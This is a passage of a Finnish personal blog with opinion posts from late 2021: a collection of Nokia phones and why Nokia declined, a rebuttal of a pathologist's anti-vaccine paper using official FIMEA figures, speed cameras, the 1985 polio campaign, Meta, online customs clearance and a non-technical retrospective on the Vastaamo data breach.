Mutta kun kyseessä oli matkapuhelinyhtiö se ei nähnyt, mihin kehitys oli menossa. Luurien sijaan tärkeäksi nousivat sovellukset ja palvelut. Niissä Nokian Ovi-viritys oli kerrassaan surkea eikä toiminut kunnolla valtavassa laitevalikoimassa. Olisi pitänyt nähdä, sillä Nokia itse laneerasi ajatuksen älypuhelimesta ja puhelimesta tietoyhteiskunnan palvelujen päätelaitteena.

Nokia ei nähnyt edes laitepuolen tulevaa kehitystä. "Jossain vaiheessa ihmiset tajuavat, että erittäin suurella näytöllä varustettu puhelin on yksinkertaisesti tyhmä asia", sanoi Nokian matkapuhelinjohtaja Niklas Savander vuonna 2012. 

Huippuvuosista alkaa olla niin pitkä aika, etteivät nuoret tiedä ajasta, jolloin Symbian oli aikansa iPhone ja Nokia aikansa Apple, ihailtu ja kunnioitettu globaali markkinajohtaja. Toimittajat ympäri maailman lensivät Suomeen katsomaan maata, jossa lapsillakin oli oma puhelin ja jossa ostoksia saattoi maksaa automaatista tekstiviesteillä.

Olen kerännyt Nokian klassisia puhelimia ymmärtääkseni paremmin, mikä Nokiassa meni pieleen, ja säilyttääkseni jälkipolville tämän uskomattoman ajan Suomen teollisuuden historiassa.

Nokian ja muidenkin puhelimia.

Alemmalla hyllyllä on vasemmalla pino Lumia-malleja, Apple iPhone 2, 3 ja 4, Jollan ensimmäinen malli sekä oikeassa reunassa MyOrigo ja Nokian Vertu-replika. 

Toisella hyllyllä ovat mm. Communicatorit ja vanhimmat käsipuhelimet.

Lisää Nokiaa.

Olen kerännyt vain tärkeimmät mallit ja jättänyt suosiolla vanhat peruspuhelimet pois. Varsinkin 2000-luvun ensimmäisinä vuosina Nokia julkaisi suorastaan ällistyttävän määrän puhelimia. 

Voi vain ihailla sitä rohkeuden ja innovoinnin määrää, joka näihin puhelimiin on mennyt. Osa ideoista oli suorastaan hulluja, kuten "huulipunamallit", pyöreä numeronäppäimistö ja erikoisesti muotoiltu 7600, missä näppäimet olivat näytön ympärillä. Mutta silloin Nokialla oli varaa ja halua kokeilla.

Keräilyssä olen huomannut, että vaikka Nokiaa pidettiin helppokäyttöisinä ja kestävinä, älypuhelimet olivat usein kaikkea muuta. Joissakin malleissa on tyyppivikoja, joiden vuoksi ehjiä yksilöitä on liki mahdotonta löytää. 3650-puhelinten näppäimistä lähtee valkoinen väri, 9300 Communicatorin nurkat kuluvat puhki ja N95:n takakannen kiinnitys rikkoutuu helposti. 

Osa puhelimista on täysin kuolleita, eikä edes uusi akku tai suora kytkentä virtalähteeseen saa niitä heräämään. Ilmeisesti piirilevyn elektroniikka on pettänyt. N95 sai jo tuoreeltaan kritiikkiä kotimaan lehdistössä. Vikoja oli myös softassa. N97 julkaistiin niin bugisena, että se vahingoitti yhtiön mainetta vielä pitkään, eikä päivitetty N97 mini ollut juuri parempi.

Käytettävyys onnistui välillä, toisinaan taas ei. Virtakytkintä saa etsiä, samoin sim-kortin paikka vaihtui joka mallissa. 7650-mallista en löytänyt sim-paikkaa ennen kuin etsin netistä sen käyttöohjeen. 

Ehkä tuotekehityksen ongelmien, ehkä kaupallisten syiden vuoksi Nokia rampautti puhelimia omilla valinnoillaan. Communicatoreissa ei ollut kameraa eikä kaikissa edes wifiä, 6210 Navigator-mallissa oli gps mutta ei wifiä. Vuonna 2006 julkistettu XpressMusic-mallissa oli vain 2G-yhteys, ei 3G:tä eikä wifiä. Nokia halusi suojella operaattoriasiakkaitaan ja vähätteli pitkään tarkoituksella langattoman lähiverkon merkitystä.

Entinen nokialainen kertoi viestissään, miten yhtiö halusi säästää tekniikan kuluissa, jotta kate maksimoitiin. Puhelimiin käytettiin vanhoja cpu- ja gpu-piirejä, jolloin työaika kului softan optimointiin. Itse softaa ei arvostettu, eri alustoille jouduttiin kehittämään rinnakkaisia sovelluksia, mikä söi tuotekehityksen resursseja ja johti yhteensopivuusongelmiin. 

Jossain vaiheessa Nokia omaksui erikoisen käytännön: se alkoi piilottaa puhelinten tyyppimerkintöjä. Tämän seurauksena nettikirppiksillä myydään puhelimia väärillä numeroilla. Joskus tyypin selvittäminen vaatii salapoliisityötä. Akun alta löytyvä RM-numero auttaa googlaamaan, mistä mallista oikein on kyse.

Nokialaisissa oli myös ominaisuuksia, joita kaipaa yhä vieläkin: erillinen kamerapainike, linssin eteen siirtyvä suojaläppä, mahdollisuus puhelun nauhoittamiseen (varoituspiippauksen kera) ja oikea näppäimistö, joka kääntyi esiin näytön alta. Varsinkin E7 on tästä syystä suosikkini. Communicator-malleilla olisi vieläkin kysyntää, jos jokin valmistaja tekisi ajanmukaisen Android-laitteen samalla idealla. Jarkko Sipilä kertoi kirjoittaneensa 9210 Communicatorilla jopa novellin. "Ei tarvinnut paljoa edes käsitellä, kun naputtelu oli niin hidasta. Syntyi heti hyvää tekstiä", hän kommentoi.

Seuraavassa postauksessa kuvia ja muistoja Nokian legendaarisista malleista. 

perjantai 19. marraskuuta 2021

Patologi Seppo Sutinen ei suosittele koronarokotusta

Koronarokotus herättää tunteita ja saat monet tekemään omaa tutkimusta aiheesta. Miksi uskoa viranomaisia, kuten netistä löytyy niin paljon sensuroimatonta, oikeaa tietoa? Jokainen tehköön omat johtopäätöksensä sen sijaan, että ajelehtisi virran mukana. 

Mutta miten ajatella itsenäisesti? Miten erottaa oikea tieto väärästä, etenkin kun aihe on niin uusi, etteivät asiantuntijatkaan tiedä siitä kaikkea? Ahkera googlaaminen ja Youtuben katselu ei ole ratkaisu. Ne vain vahvistavat ennakko-olettamia, joita hakijalla on jo mielessään. Algoritmit tekevät tehtävänsä ja tarjoavat meille sitä, mitä haluamme (usein jopa tietämättä, että haluamme).

Eilen osui Twitterissä silmään rokotevastaisten levittämä analyysi, jonka on laatinut Seppo Sutinen, lääketieteen ja kirurgian tohtori, erikoislääkäri ja patologian dosentti emeritus. Yllättäen hän päätyi hyvin kielteiseen lopputulokseen: 

Seppo Sutisen loppupäätelmä rokotusten turvattomuudesta.

Kansainvälisen tapaamisen yhteinen lopputoteamus oli, että Covid-19-rokotukset tulisi välittömästi keskeyttää. "Patologin näkökulmasta Covid-19-rokotus ei ole niin turvallinen, että sen ottamista voisi suositella. Rokotuksesta on jo aiheutunut haittoja, eikä kukaan tiedä mitä rokotetut saavat tulevina vuosina kokea. Olisi aika turvautua muihin keinoihin pandemian voittamiseksi."

Ilmeisesti muut keinot olisivat koulujen ja kokoontumisten keskeyttäminen. Sitä ei kestäisi talous eikä ihmisten pää kahden vuoden koronarajoitusten jälkeen. 

Yllättävän vahva kannanotto ja ristiriitainen sen kanssa, mitä Suomen ja maailman terveysviranomaiset yleensä suosittelevat. Tietääkseni tätä lausuntoa on jaettu myös eduskunnassa, ikään kuin se olisi päätöksenteossa puuttuva järjen ääni. Piti oikein tarkistaa, onko paperi aito, mutta ilmeisesti on, sillä Seppo Sutinen tosiaan löytyy Lohjalta. 

Maallikon on mahdotonta analysoida koko tekstiä, joka vilisee viittauksia ja lainauksia kansainväliseen tutkimukseen. Yksi kohta on kuitenkin helppo arvioida: viittaukset Suomen ja FIMEAn tilastoihin: 

Viittaus FIMEAn lukuihin. 

"Suomessa FIMEA ilmoitti 45 koronarokotuksen haittavaikutuksena 130 kuolemaa." Sitaatista saa käsityksen, että viikossa rokotus olisi aiheuttanut 130 kuolemaa - sehän olisi suorastaan järkyttävä määrä. 

Katsotaan, miten FIMEA itse kertoo asiasta

FIMEAn viralliset tiedot.

FIMEA kertoo, että 16.11.2021 mennessä oli käsitelty yhteensä 132 haittavaikutusilmoitusta, joissa potilas oli menehtynyt (siis yhteensä rokotusten alkamisesta lähtien). Haittavaikutusilmoitus ei tarkoita syy-yhteyttä, se on pelkkä ilmoittajan antama tieto. FIMEAn mukaan kolmasosa tapauksista on sellaisia, joissa potilaan "katsotaan menehtyneen pitkälle edenneisiin perussairauksiin tai niiden komplikaatioihin, rokotteen mahdollista myötävaikuttavaa roolia ei voida täysin poissulkea."

FIMEAn teksti antaa siis täysin eri kuvan tilanteesta kuin Seppo Sutisen teksti. Ottaen huomioon, että rokotteita on annettu yli neljälle miljoonalle suomalaiselle, 40 tapausta, joissa rokotteen mahdollista myötävaikuttavaa roolia voidaan epäillä, ei ole kovin paljon. Samassa ajassa koronaan on kuollut yli 1100 suomalaista.

Ei ole syytä epäillä FIMEAn valehtelevan, joten ainoa johtopäätös on, että Sutinen on tulkinnut lukuja joko tahallisesti tai tahattomasti virheellisesti ja tarkoitushakuisesti. Hänen motiivejaan voi vain arvailla. 

Luultavasti muutkin Sutisen analyysin viittaukset paljastaisivat samanlaisia tulkintoja, joten en pidä myöskään loppupäätelmää luotettavana. Ihmettelen, miksi hän on tällaisen paperin laatinut. Paperin levittäminen muka todisteena rokotusten terveysvaaroista on suorastaan vastuutonta. 

Googlen mukaan Seppo Sutinen on 90-vuotias ja vanhoillislestadiolainen. Kristillisen puolueen jäsenistä peräti 40 prosenttia suhtautuu epäille koronarokotukseen. Luku on hämmästyttävä. Ilmeisesti myös kristityt uskovat kohtaloon ja Jumalan ratkaisuun, vaikka me liitämme kohtalouskon muslimeihin. Sitäkään en tiedä, onko Sutisen tapauksessa uskolla mitään merkitystä.

Joka tapauksessa Sutisen paperi osoittaa, miten vaikea "oma tutkimus" internetin rajattomuudessa on. Kaikenlaista aineistoa on saatavilla, josta voi valita itselleen mieluisan. Mutta silloinhan se ei ole enää mikään tutkimus.

Itse luotan lääkärien ylivoimaiseen enemmistöön ja virkamiehiin, jotka tekevät päätöksiä virkavastuulla. Nettijulkaisijoista ei koskaan tiedä, mikä on heidän motiivinsa. Vastuuta heillä ei ole lainkaan. 

torstai 18. marraskuuta 2021

Kamala sokeripala, joka yhdistää ja repii kansaa

Vuonna 1984 Suomessa havaittiin poliotartuntoja, eikä silloin käytetty rokote enää suojannut aktiiviselta viruskannalta. Viranomaiset päättivät käynnistää koko maassa joukkorokotukset, joilla suoja tautia vastaan saatiin ajan tasalle. 

Helmikuussa 1985 suomalaisille jaettiin työpaikoilla ja kouluissa sokeripala, johon oli tiputettu pari tippaa oikeaa poliovirusta. Se tehosi, eikä polioepidemiaa päässyt syntymään. Koko kansan rokottaminen sujui viidessä viikossa -- mutta olihan sokeripalan imeskely helpompi prosessi kuin kaksi kertaa annettava koronapiikki.

Ilta-Sanomien juttu kuvaa hyvin tuon ajan tapahtumia. Tutulta kuulostaa erityisesti tämä: – Joillekin ihmisille outo rokote oli tietysti pelottava, varsinkin kun mediassa esiintyi ennen kampanjaa myös väärää tietoa sen haitoista. Taudin pelko kuitenkin voitti, Hovi muistelee.

Voi vain kuvitella, millainen kohu olisi syntynyt, jos vuonna 1985 kansalaiset olisivat olleet netissä ja sosiaalisessa mediassa. Netin ansiosta yksittäiset epäilijät löytävät toisensa ja yhdistävät voimansa, innoittaen toinen toistaan. Mitä enemmän oma sanoma saa muilta tykkäyksiä ja kommentteja, sitä enemmän kierroksia siihen lisätään.

Koronarokotetta epäillään siksi, että luottamus viranomaisiin on koetuksella. On vaikea viestiä johdonmukaisesti, kun vastassa on alati kehittyvä tautitilanne ja muuntuva virus. Tutkijatkaan eivät vielä tiedä tarpeeksi viruksen leviämisestä ja siitä, miksi osa ihmisistä on sille niin alttiita. Tieteellinen epävarmuus ja politiikka eivät sovi yhteen netin ehdottomuuden ja mustavalkoisuuden kanssa.

Mutta ei vuoden 1985 rokotuskampanja ihan ongelmitta mennyt. Rokotuskattavuus nousi 90-95 prosenttiin, alueellisia eroja oli jo silloin. Helsingin Sanomien mainio Aikakone-palvelu löytää kiinnostavan jutun 27.2.1985 otsikolla Kamala sokeripala, joka yhdistää ja repii kansaa

Talven 1985 poliorokotus herätti kansassa ristiriitaisia tuntemuksia. 

Rokotteen saaneet raportoivat puutuneista jaloista ja käsistä, kammottavasta päänsärystä, pyörtyilystä, hervottomasta oksentelusta, pettävistä polvista ja sumeudesta silmissä. "Polioon sairastuminen pelottaa, mutta ainakin yhtä paljon kammottaa mystinen sokeripala". Hieman liioitellen toimittaja vertasi sokeripalaa myrkkymaljaan. "Älä tule niin lähelle senkin viruksen syönyt. Mä olen vielä puhdas."

Yksi pelkoja herättänyt asia oli se, että sokeripalassa oli aitoa poliovirusta. Koronarokotuksissa monia arveluttaa uusi mRNA-tekniikka.

Minkälaista kohu olisikaan, jos rokotteessa olisi aitoa koronavirusta?

Lopuksi vielä vertaus: Henkilö, joka jättää koronarokotteen ottamatta sivuvaikutusten pelossa on kuin matkustaja, joka kieltäytyy putoavassa lentokoneessa laskuvarjosta koska pelkää, ettei varjo avaudu.

keskiviikko 3. marraskuuta 2021

Pienten ylinopeuksien sakotus ei paranna liikenneturvallisuutta

Liikennelääketieteen emeritusprofessori Timo Tervo arvosteli 27.10.2021 Hesarissa nopeusvalvontakameroita ja pienten ylinopeuksien sakottamista. Tänään hän oli Maikkarin aamuohjelmassa keskustelemassa aiheesta poliisin kanssa. Toisin kuin muissa pohjoismaissa, Suomessa liikenneturvallisuuden kehitys on pysähtynyt, vaikka nopeusvalvontakameroita lisätään jatkuvasti. Jotain uutta pitäisi keksiä.

Kirjoitin aiheesta vuonna 2010 ilmestyneessä Yksityisyys-kirjassani. Tiivistelmä oli, että nopeuksia mitataan sen vuoksi, että se on helppo tehdä. Oikea valvonta ja liikenneturvallisuus vaatisivat resursseja, joihin valtiolta ei tunnu löytyvän rahaa. Ei, vaikka oikea valvonta maksaisi itsensä takaisin niin sakkotuloina kuin henkilövahinkojen vähentymisenäkin.

Ajoin korttini jo 1980-luvulla ja olen siitä lähtien pyrkinyt noudattamaan nopeusrajoituksia. Yli 30 vuoden puhtaan tilin jälkeen sain viime vuonna ensimmäisen ylinopeussakon. Kamera oli napannut kuvan, kun toukokuisena lauantai-iltapäivänä ajoin Kangasalan suunnasta kohti Tamperetta, ja tähystelin monikaistaisessa risteyksessä oikeaa kaistaa, minkä valita. Muuta liikennettä oli tuskin lainkaan.

Toinen sakko tuli viime kesänä sunnuntai-iltapäivällä Kemiön saarella, jossa taajaman kamera nappasi kuvan. En ollut huomannut rajoituksen laskua 40 kilometriin, kun tie ei juuri muuttunut eikä missään näkynyt ristin sielua. 

Molemmat ylinopeudet olivat nipin napin sakotuskynnyksen ylittäviä. Kumpikaan ei vaarantanut liikenneturvallisuutta.

Olen samaa mieltä Timo Tervon kanssa: jos järjestelmä sakottaa niitä, jotka parhaan kykynsä mukaan yrittävät noudattaa rajoituksia, se ei täytä tarkoitustaan. Valvonnan pitäisi napata ne, jotka ajavat piittaamattomasti ja muita vaarantaen, roikkuvat edellä ajavan perässä eivätkä ole ajokunnossa väsymyksen, alkoholin tai huumeiden vuoksi. Nyt sellaista valvontaa on tuskin lainkaan.

Viime sunnuntaina ajoin Lahden moottoritietä. Noudatin tunnollisesti 100 km/h rajoitusta sillä seurauksella, että jokainen auto ajoi ohi. Moottoritiellä kun ei ole kameroita, eikä juuri valvontaakaan. Oma rajoitusten noudattaminen tuntui aiheuttavan liikennehäiriön, joka haittasi muita.

Ajan usein myös Kehä I:tä, johon tuli kamerat muutama vuosi sitten. Useimmat ajavat ylinopeutta mutta jarruttavat aina kameran kohdalla. Itse säädän vakionopeuden 73 kilometriin, jonka tiedän mittarivirheen vuoksi vastaavan tasan 70 km/h arvoa. Yleensä joku tulee roikkumaan takapuskuriin, etenkin jos ajan vasemmalla kaistalla (josta käännytään Otaniemeen). 

Maanteillä 60 - 80 -100 km/h vaihtuvat välillä hyvinkin tiheään, aina ennen risteysalueita. Miten kukaan voi enää ajaa autoa ilman vakionopeuden säädintä? Ilman automatiikkaa huomio pitäisi kiinnittää liikenteen sijaan nopeusmittariin.

Jos parhaansa yrittäminen ei riitä, 170 euron maksu alkaa tuntua puhtaalta rahastukselta. Summaa ei ole edes porrastettu tulojen mukaan, joten se on pienituloiselle kohtuuton rokotus. HSL:n päätös korottaa pummilla matkustamisen tarkastusmaksu 80 eurosta 100 euroon nostatti äskettäin porua, se kun rankaisee tiettyä ihmisjoukkoa (niitä, joilla ei mielestään ole varaa tai halua maksaa lipusta). Tahalliseen tekoon verrattuna 170 euron tahaton ylinopeussakko on aivan eri luokan asia.

Kannabiksen laillistamista on puolusteltu sillä, ettei ole järkeä tehdä monista suomalaisista lainrikkojia. Että laki, jota ei noudateta, on turha. Saman perustelun voisi esittää myös valvontakameroista.

Jos oikeaan liikennevalvontaan ei löydy poliiseja eikä rahoja, luovutaan sitten edes turvallisuuden kehittämisen tavoitteista.

Lisäys 18.11.2021: Tällainen uutinen tuli juuri: "Onnettomuustietoinstituutin selvityksen mukaan joka neljäs kuljettajista ajoi ylinopeutta vähintään 30 kilometriä tunnissa ja miltei yhtä moni ylitti törkeän rattijuopumuksen rajan." Samanlaisia uutisia oli jo 10+ vuotta sitten, kun tein Yksityisyys-kirjaa, joten ei tieto mikään uusi ole. Sitaatista jää puuttumaan se, että toinen suuri riskitekijä olivat iäkkäiden kuljettajien havaintovirheet. 

tiistai 2. marraskuuta 2021

Miljoonan ja miljardin ero

10 miljardin menoerä tuntuu herättävän vähemmän keskustelua kuin 200 miljoonan meno. Kun kyse on näin suurista rahoista, mittasuhteet hämärtyvät yhtä tehokkaasti kuin sosiaalisen median väittelyissä, joissa kärpäsestä kasvaa härkänen ja yksi erikoistapaus yleistetään kuvaamaan koko alaa.

Jos matematiikka on koulun jälkeen unohtunut muistutetaan, että miljoonassa on kuusi nollaa ja miljardissa yhdeksän. Siksi 10 miljardia on sama kuin 10 000 miljoonaa. Nyt luku näyttää jo paljon suuremmalta. Aivot katsovat vain absoluuttista luku (10 vs. 10 000) eivätkä kiinnitä huomiota loppumääreeseen, vaikka se on kaiken ydin. 

Kaiken lisäksi miljoona ja miljardi näyttävät ja kuulostavat liki samalta, mikä hämää ajattelua. "10 miljardia" kuulostaa kohtuulliselta summalta, jos poliitikot niin päättävät. Eivätkä he itsekään aina ymmärrä miljoonan ja miljardin eroa. 

Havainnollistetaan asiaa pinoamalla seteleitä päällekäin. Eurosetelien tekninen paksuus on 0,105 millimetriä. Arkisesti voisi sanoa, että 100 kappaletta seteleitä on yhden senttimetrin korkuinen pino rahaa. Jos setelit ovat satasia, sentin pinossa on siis 10 000 euroa ja metrin pinossa miljoona euroa. 

Miljardin rahapinon korkeus on yksi kilometri. 

Kilometrin pino sadan euron seteleitä - se on jo havainnollista Kyse on järjettömän suuresta summasta. Ja 10 miljardia olisi peräti 10 kilometrin pino.

Käytännössä asia on mutkikkaampi. Jos seteleitä on vain sata kappaletta, pinon todellinen korkeus on enemmän kuin laskennallinen senttimetri, koska setelit eivät ole koskaan täysin suoria ja niiden väliin jää ilmaa. Joku rahakas voi kokeilla, mutta arvelisin 100 setelin pinon olevan 1,5-2 senttiä korkea, eli jopa tuplasti enemmän kuin suoralla kertolaskulla saadaan.

Kun rahaa on 10 kilometrin verran, setelit painavat jo niin paljon, että rahapino alkaa painaa itseään kasaan pohjasta alkaen. Siksi 10 kilometriä on riittävän tarkka likiarvo 10 miljardin rahapinolle. 

Mitä tällainen pino painaisi? Yksi 100 euron seteli painaa 1,02 grammaa, joten metrin pino (10 000 seteliä, miljoona euroa) painaa 10,2 kiloa. Miljardi painaisi jo 10 200 kiloa ja 10 miljardia yli 100 tonnia. Onneksi rahat siirtyvät bitteinä. Muutoin 10 miljardin ostoksen maksaminen vaatisi laivan kuljettamaan rahoja Atlantin yli.

Satasen setelit ovat harvinaisia. Jos käytetään yleisiä 50 euron seteleitä, pinojen korkeuden voi kertoa kahdella. Samoin painon, joskin 50 euron seteli on hieman satasta pienempi ja kevyempi.

Juha Turunen sai huomata setelien painavuuden kantapään kautta. Hän kidnappasi Herlinin sukuun kuuluvan perijän kesällä 2009 ja vaati kahdeksan miljoonan euron lunnaita käteisellä. Hän sai rahat, mutta 80 kilon painoisen rahamäärän poiskuljettaminen parkkihallista oli odotettua hankalampaa, sillä Turusella oli vain polkupyörä ja siinä peräkärry. Osa rahoista putosi, osa levisi parkkihallin rampille.

Vielä yksi vertaus: miljoona sekuntia tästä (2.11.2021) eteenpäin on 13.11.2021. Miljardi sekuntia eteenpäin on 11.7.2053. 

Joka tapauksessa kyse on valtavista summista, valtavista rahamääristä. Seuraavan kerran, kun joku puhuu 10 miljardin investoinnista itsestäänselvyytenä, poistan varmistimen.

perjantai 29. lokakuuta 2021

Facebook on jatkossa Meta - positiivinen näkökulma

Facebook julkisti eilen odotetun uudistuksen: emoyhtiön nimeksi tulee Meta, ja Facebook on jatkossa vain yksi sen palveluista. Google teki samanlaisen uudistuksen vuonna 2015, kun emoyhtiön nimeksi valittiin Alphabet ja hakukoneyhtiö jäi sen alaisuuteen.

Facebookille vuosi 2021 on ollut jatkuvaa PR-katastrofia. Aivan kuten oli edeltävä 2020. Ja 2019 sekä 2018, jolloin kujanjuoksu alkoi Cambridge Analytica -skandaalista. Siitä lähtien yhtiö on kulkenut ongelmasta toiseen. Käyttäjämäärä on kuitenkin lisääntynyt ja kurssi noussut, joten taloudellisesti Facebookilla ei ole hätää.

Monet ovat epäilleet Facebookin vaihtavan nimeään, jotta median huomio siirtyisi pois ikävistä asioista. Itse haluan nähdä asian paljon laajempana, jopa positiivisena asiana. 

Olemme eläneet nettiaikaa 25 vuotta, siis jo neljännesvuosisadan. Olen seurannut kehitystä koko ajan ja valitettavasti kaikki tuntuu viime aikoina pysähtyneen. On tultu kauaksi alkuvuosien villeistä ja innostavista ajoista. Nettisurffailu on mennyt suorastaan taaksepäin, sivujen selaaminen on työlästä lupakyselyiden klikkaamista ja mainosten välttelyä. Älypuhelimiin ei ole enää vuosiin tullut muuta uutta kuin parempia kameroita.

Zuckerberg on harvinaisessa asemassa: hänellä on miljardikaupalla rahaa ja vapaus tehdä mitä huvittaa. Jos joku voi kehittää tulevaisuuden internetin, se on juuri hän. Zuckerberg on vasta 37-vuotias, hänellä on vielä ainakin 30 vuotta aikaa vaikuttaa tulevaisuuden kehittymiseen.

Eri asia sitten, onko juuri metaversumi oikea suunta, vai onko kyseessä vain yritys kosiskella pelimaailmoihin tottuneita nuoria takaisin Facebookin palveluiden sateenvarjon alle. Ensimmäiset demot näyttävät hölmöiltä ja lapsellisilta, mutta ei anneta sen hämätä. Ensimmäiset nettisivutkin olivat hassuja. Kuka muistaa esimerkiksi Cambridgen yliopiston kahvinkeittimen (Trojan Room Coffee Pot), jota pällisteltiin videokameran kuvasta kuin suurtakin ihmettä?

Ei siis tuomita kehitystä vielä. Metaversumi voi olla tuhoon tuomittu yritys lämmittää jälleen kerran AR/VR-laitteiden markkinoita (muistatko Google-lasit?), mutta ainakin se on edes jotain. 

Nykyinen netti on kuin pystyyn kuollut metsä ja kaipaakin uudistusta. Tervetuloa Meta ja metaversumi, on teidän aikanne yrittää!

perjantai 22. lokakuuta 2021

Tullaus itsepalveluna netissä

Takavuosina ulkomailta tilatut tuotteet piti noutaa Vantaan tullipostista, nyt asian voi hoitaa netissä itsekin. Mutta ihan helppoa se ei ole.

Sähköposti ja tekstiviesti ilmoittivat uuden lähetyksen saapumisesta. 

Saapumisilmoitus

Linkki vie ensin postin sivulle (onhan se todellinen, eikä huijaus - onhan?), missä kehotetaan tekemään tullaus ja maksamaan sen jälkeen 2,90 euroa postille. Siispä tulliin.

Tullaus alkaa.

Lähetyksen tiedot tuottavat sitten jo ongelmia.

Mistähän tässä on kyse?

Yhdysvallat on listassa oletusarvo. Postin ilmoituksesta ei kuitenkaan voi tietää, mikä lähetys on kyseessä. Ei ongelmaa, jos tilaa vain yhden tavaran vuodessa, mutta jos on tilannut useampia, tässä vaiheessa joutuu vain arvailemaan, mistä on kyse. 

Myyjäksi ilmoitettu ITBFULFILLMENT LLC ei kerro mitään, koska se on pelkkä logistiikkakeskus. 

Lähetyksen arvo ja kuljetuskulut pitää ilmoittaa erikseen, joten sähköpostin tilausvahvistus täytyy kaivaa esiin. Toivottavasti se on yhä tallessa. Jos tämä on se lähetys mitä luulen, tein ennakkotilauksen jo keväällä, joten odotus on ollut pitkä.

Seuraavaksi kysytään, onko tuote valmisteveron alainen.

Valmisteverolliset tuotteet?

Info-painike (kysymysmerkki) auttaa, mutta silti voi olla vaikea tietää, sisältyykö juuri tähän tuotteeseen erityisiä maksuja.

Lisäksi pitää täyttää kenttä Postin käsittelymaksusta. Mistähän syystä?

Tavaran tiedot on kaikkein hankalin rasti.

Hmm... mihin luokkaan tämä kuuluisi?

Kirjat, tietokoneet tai vaatteet ovat selkeitä tapauksia, mutta aina luokituksen valinta ei ole helppoa. Esimerkiksi tietokoneen komponenteista ja lisäosista on useita kategorioita, mutta ei juuri sitä, mihin oletan tämän liittyvän. Mutta valitaan nyt jokin riittävän oikealta tuntuva.

Hinta uudelleen?

Jostain syystä hinta pitää kirjoittaa uudelleen, minkä jälkeen tulli esittää grafiikalla ALV-osuuden. 

Graafinen näyttö.

51,15 euron arvoinen tilaus nousi kuljetuksen ja ALV:n jälkeen 73,63 euroon. Tulli näyttää maksun tiedot:

Valmis maksulomake.

Maksu onnistuu saman tien pankkikortilla, viitenumero ja summa siirtyvät automaattisesti. Tämä on vielä helppoa, mutta Postin 2,90 euron maksu pitää käydä hoitamassa erikseen.

Käsittelymaksu 2,90 maksetaan erikseen.

Kun lähetystunnus on syötetty, Posti vihdoin kertoo lähetyksen painon - tämä on hyvin kevyt, vain 0,049 kiloa. Jos painon olisi nähnyt heti aluksi, olisi ollut helpompi arvioida mistä on kyse. 

Paino 0,049 kiloa.

Posti näyttää valmiin maksupainikkeen:

Vielä yksi klikkaus...

Sen jälkeen maksut on hoidettu ja jäädään odottamaan, milloin paketti saapuu.

Tullaaminen on väistämättä monimutkainen toimenpide. Tullin nettisivu tekee asian niin helpoksi kuin sen ylipäätään voi tehdä. Postin ja Tullin yhteistyö kuitenkin ontuu. Miksei saapumisilmoituksessa kerrota edes painoa, jos se kuitenkin on Postin tiedossa? Miksei yksi maksu riitä niin, että Tulli tilittäisi siitä suoraan 2,90 euroa Postille? Miksi lähetystunnus pitää syöttää useaan kertaan? Miksi 2,90 euroa pitää kirjoittaa itse kenttään, jossa lukee "ilmoita summaksi 2,90 euroa"?

Tilasin aiemmin tavaroita Englannin Amazonista, mutta sen pudottua EU-rajan ulkopuolelle tavarat pitää tullata, ja siitä tuli viimeksi ongelmia. Lähetysmaaksi oli merkitty Luxemburg, joka on EU:n sisällä. Oli todella vaikea selvittää, mistä lähetyksestä oli sillä kertaa kyse.

Jatkossa en enää käytä Englannin Amazonia ja pyrin vähentämään ulkomailta tilaamista muutenkin. 

torstai 21. lokakuuta 2021

Vuosi Vastaamo-tapauksesta

Tänään 21.10. tulee kuluneeksi vuosi Vastaamon tietomurron paljastumisesta mediassa. Ensimmäinen juttu tapahtuneesta oli Henrik Kärkkäisen uutinen  Psykoterapiakeskus joutui tietomurron kohteeksi - potilastiedot varastettiin. Seuraavan vuoden keväällä Kärkkäinen palkittiin suurella journalistipalkinnolla Vastaamo-uutisoinnistaan.

Ja uutisoitavaa totisesti riitti! Kärkkäinen oli yhteydessä kiristäjään, joka alkoi julkaista tietoja pimeässä verkossa sadan henkilön erissä. Verkkoon lipsahti suurikokoinen tiedosto, jota kukaan ei ehtinyt ladata kokonaisena. Koska Vastaamo oli kieltäytynyt maksamasta, kiristäjä alkoi vaatia rahaa uhreilta. Lauantai-iltana heidän sähköposteihinsa ilmestyi lunnasvaatimus Bitcoineina.

Vastaamo on säilynyt otsikoissa näihin päiviin asti. Tammikuussa tietoja levitettiin tavallisen verkon puolella, helmikuussa yhtiö ajautui konkurssiin ja elokuussa netissä toimi hetken vastaamohaku.com, jolla kuka tahansa pystyi hakemaan tietoja. Se saatiin kuitenkin suljettua nopeasti. 

Vielä viikko sitten Vastaamo oli uutisissa, kun Asiakastieto lähetti epäselvän tiedotteen luottotietovahdin muutoksista. 

Miten Vastaamon tietomurto todella tapahtui ja kuka siitä tiesi, on vieläkin epäselvää. Ehkä asioihin saadaan valaistusta sitten, kun poliisitutkinta valmistuu ja asiaa aletaan käsitellä oikeudenkäynnissä. Rikosnimikkeet tulevat olemaan yksi mielenkiinnon kohde.

Uhreille kulunut vuosi on ollut yhtä kärsimystä. Potilaskertomusten vuotamisen lisäksi nettiin on päätynyt myös henkilötietoja, joita on saatettu käyttää identiteettivarkauksiin. Uhrit ovat joutuneet ottamaan maksullisia luottokieltoja, jotta heidän tietojaan ei käytettäisi väärin. Tiettävästi mitään laajaa väärinkäytösaaltoa ei ole tapahtunut. Suhtautuminen verkkotilauksiin on kiristynyt aiemmasta, eikä identiteettivarkaus enää onnistu yhtä helposti kuin aiemmin.

Ylen arvion mukaan uhrit voisivat saada Vastaamon konkurssipesältä enintään 2500 euron korvaukset. Se tuskin kattaa henkisiä kärsimyksiä. Yli 25 000 uhria on tehnyt rikosilmoituksen. Tuntuu kohtuuttomalta, että tällaisessa jutussa jokainen joutuu hoitamaan asiansa itsenäisesti, vaikka kaikkien rikostapaus on samanlainen. Korvausten hakeminen ei sekään ole yksinkertaista.

Saadaanko tekijää koskaan selville ja vastuuseen? Mikko Hyppönen uskoo, että tekijä jää kiinni. Itse en usko. Poliisi on viran puolesta optimistinen. Kesäkuussa tutkinnanjohtaja Marko Leponen KRP:stä kertoi tutkinnan etenevän hyvin. 

Digitaaliset jäljet ehtivät kuitenkin kylmetä jo ennen kuin poliisitutkinta alkoi. Tekijän selvittäminen, tuomiosta puhumattakaan, voisi toteutua vain, mikäli kiristäjä tulee katumapäälle ja tunnustaa tekonsa. Se ei ole todennäköistä.

Vastaamosta on opittu paljon, kantapään kautta. Suomen pahin it-rikos havahdutti huomaamaan, miten heikkoa kriittisten henkilötietojen valvonta on, ja miten nettisivulla annetut hurskaat vakuuttelut turvallisesta käsittelystä ovat pelkkää sanahelinää, jos niin ei todellisuudessa toimita.

